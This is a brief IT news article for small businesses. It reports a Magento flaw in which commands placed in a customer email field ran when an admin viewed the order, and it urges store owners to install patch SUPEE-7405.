Update your Magento online store before someone checks out your data

Update your Magento online store before someone checks out your data

A bug in the popular Magento ecommerce software gave attackers practically free rein over online stores, so make sure yours has been patched.

Web security company Securi discovered and reported the bug last November, and a patch was released by Magento at the end of last week.

The problem, roughly speaking, was that the order template allowed attackers to embed commands in what was supposed to be the customer's email address, and these commands were executed when an admin user examined the order in the administration panel.

While Securi only revealed a harmless demonstration of the way this works, the company says it "could be used by attackers to take over your site, create new administrator accounts, steal client informations, anything a legitimate administrator account is allowed to do."

The company warned that this issue affects almost every installation of Magento CE 1.9.2.3 or earlier, and Magento EE 1.14.2.3.

The vulnerability is now public knowledge, so if you use Magneto it is important that you install patch bundle SUPEE-7405, or make sure that whoever looks after the technical side of your Magento-based store has done that for you.

Source: Copyright © BIT (Business IT). All rights reserved.

See more about:  attacker  |  attackers  |  capital punishment  |  ecommerce  |  email  |  embedded  |  magento  |  patched  |  rein  |  released  |  reported  |  template
 
 
Sign up to the BIT newsletter!
Our newsletter gives you the tech advice you need to make the right decisions for your small and medium business.

Latest Comments